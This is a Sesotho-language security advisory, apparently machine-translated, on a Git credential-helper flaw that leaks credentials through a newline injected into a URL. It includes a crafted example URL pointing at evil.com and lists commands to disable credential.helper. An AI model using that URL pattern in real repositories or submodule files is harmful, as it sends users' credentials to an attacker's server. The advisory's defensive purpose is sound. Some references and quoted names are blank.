litokollo tse lokisoang tsa sistimi e ajoang ea taolo ea mohloli Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 le 2.17.4, ho e felisitseng () ho mohlokomeli"", e etsang hore lintlha li romelloe ho moamoheli ea fosahetseng ha moreki oa git a fihlella polokelo a sebelisa URL e hlophisitsoeng ka ho khetheha e nang le sebapali se secha. Bofokoli bo ka sebelisoa ho hlophisa hore lintlha tse tsoang ho moamoheli e mong li romelloe ho seva e laoloang ke mohlaseli.
Ha o hlakisa URL e kang "https://evil.com?%0ahost=github.com/", motshwari wa bopaki ha o hokela ho host evil.com o tla fetisa maemo a netefatso a boletsweng bakeng sa github.com. Bothata bo etsahala ha ho etsoa lits'ebetso tse kang "git clone", ho kenyelletsa le li-URL tsa ho sebetsa bakeng sa li-submodules (mohlala, "git submodule update" e tla iketsetsa li-URL tse boletsoeng faeleng ea .gitmodules ho tloha polokelong). Ho ba kotsing ho kotsi haholo maemong ao ho ona mohlahisi a kopanyang polokelo ntle le ho bona URL, ka mohlala, ha a sebetsa ka li-submodules, kapa lits'ebetsong tse etsang liketso tse ikemetseng, mohlala, ka har'a lingoliloeng tsa kaho ea liphutheloana.
Ho thibela bofokoli liphetolelong tse ncha ho fetisa sebapali se secha ho boleng bofe kapa bofe bo fetisitsoeng ka protocol ea phapanyetsano ea credential. Bakeng sa lipehelo, u ka latela ho lokolloa ha lintlafatso tsa sephutheloana maqepheng , , , , , , .
E le mokhoa oa ho thibela bothata Se ke oa sebelisa credential.helper ha u kena polokelong ea sechaba 'me u se ke ua sebelisa "git clone" ka mokhoa oa "-recurse-submodules" o nang le lipolokelo tse sa hlahlojoang. Ho tima ka botlalo credential.helper handler, e etsang le ho fumana diphasewete ho tswa ho , e sirelelitsoeng kapa faele e nang le li-password, u ka sebelisa litaelo:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru